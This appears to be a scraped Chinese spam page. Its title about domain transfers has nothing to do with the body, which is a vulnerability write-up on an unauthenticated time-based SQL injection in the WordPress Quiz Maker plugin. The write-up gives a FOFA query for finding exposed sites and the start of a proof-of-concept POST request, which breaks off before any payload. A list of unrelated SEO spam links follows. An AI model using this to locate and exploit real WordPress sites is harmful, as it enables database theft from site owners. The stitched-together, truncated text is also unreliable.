当前位置: 首页 > news >正文

自己的域名可以转给做网站的账号吗对网站和网页的认识

自己的域名可以转给做网站的账号吗,对网站和网页的认识,网站建设师,教做炸鸡汉堡视频网站0x01 产品简介 WordPress Quiz Maker插件是一款功能强大的测验生成工具,旨在帮助用户轻松、快速地构建复杂的测验和考试。插件支持多种问题类型,包括单选框(MCQ)、复选框(MCQ)、下拉列表(MCQ)、文本、短文本、数字、日期等。还支持横幅(HTML)显示信息性消息、填空题…

0x01 产品简介

WordPress Quiz Maker插件是一款功能强大的测验生成工具,旨在帮助用户轻松、快速地构建复杂的测验和考试。插件支持多种问题类型,包括单选框(MCQ)、复选框(MCQ)、下拉列表(MCQ)、文本、短文本、数字、日期等。还支持横幅(HTML)显示信息性消息、填空题以及匹配题,让测验更加多样化和全面,适合各种规模和需求的网站使用。

0x02 漏洞概述

WordPress的Quiz Maker插件在6.5.8.3版本及以下存在基于时间的SQL注入漏洞,漏洞位于“ays_questions”参数上。由于对用户提供的参数缺乏足够的转义处理和对现有SQL查询的充分准备不足,使得未经验证的攻击者能够在已有的查询中附加额外的SQL查询,从而可能从数据库中提取敏感信息。

0x03 影响范围

Quiz Maker <= 6.5.8.3

0x04 复现环境

FOFA:"/wp-content/plugins/quiz-maker/"

0x05 漏洞复现

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe
http://www.hengruixuexiao.com/news/25796.html

相关文章:

  • 网站建设重点长沙百度推广排名
  • 微软网站开发软件郑州网站建设七彩科技
  • 运行网站需要多少钱公众号怎么推广和引流
  • 最火网站排名怎么快速排名
  • 约会软件app前十名惠州百度推广优化排名
  • 电商网站建设意义百度seo排名优化公司哪家好
  • 济南网站建设直播商丘网络推广外包
  • 番禺网站建设培训广西seo搜索引擎优化
  • 郑州大型网站建设苹果cms永久免费建站程序
  • 苏州装修公司网站建设网站宣传
  • 国内优秀个人网站站长工具查询网
  • 熟悉免费的网络营销方式河北搜索引擎优化
  • 安阳河南网站建设最新军事动态
  • 那些网站布局好看百度一下你就知道了官网
  • wordpress建站的利弊做网站需要什么技术
  • 网站 百度认证外链生成工具
  • 在百度做推广送网站好吗代运营竞价公司
  • 海外营销网站设计竞价推广账户竞价托管收费
  • 面对撞库 网站应该怎么做sem竞价推广托管
  • 怎样免费推广网站企业推广公司
  • 建德网站优化公司什么叫做网络营销
  • 自己做代购网站成都网站seo公司
  • 淮安神舟建设招标网站企业网站快速建站
  • 台州哪家做企业网站比较好百度指数查询官网大数据
  • 那个网站有免费模板常用的网络推广方法有哪些
  • 免费3d模型网站百度网盘手机app下载安装
  • 嘉兴高端网站建设seo美式
  • 网站插件开发网站站内推广怎么做
  • 网站推广策划的思路包括哪些山东seo费用多少
  • 肥乡企业做网站推广诊断网站seo现状的方法